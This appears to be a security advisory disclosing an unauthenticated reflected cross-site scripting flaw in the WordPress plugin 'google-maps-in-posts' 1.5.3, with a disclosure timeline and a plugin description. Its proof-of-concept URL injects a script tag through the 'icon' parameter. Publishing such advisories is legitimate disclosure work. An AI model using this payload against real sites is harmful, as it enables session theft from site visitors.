wp-plugin : google-maps-in-posts – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : google-maps-in-posts

 

Effected Version : 1.5.3 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Anant Shrivastava

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 
http://localhost/wp-content/plugins/google-maps-in-posts/icons/icon.php?icon=icon"><script>alert(document.cookie)</script>&

 

Vulnerable Parameter : icon

 

Type of XSS : Reflected

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-05

 
Plugin Status : Closed
 
Public Disclosure : July 7, 2014
 
CVE Number : Not assigned yet

 
Plugin Description :
 
Google Maps in Posts plugin for WordPress gives possibility to use Google Maps Services in your blog.
That could be useful for posts in WP, describing certain locations or events,
to indicate them immediately in the WP post with a map. The Google Maps Plugin
gives you a simple and easy Worpress administration back end to handle multiple
locations and your own location would be defined only once for all the maps of your WP blog.

Leave a Reply

Your email address will not be published. Required fields are marked *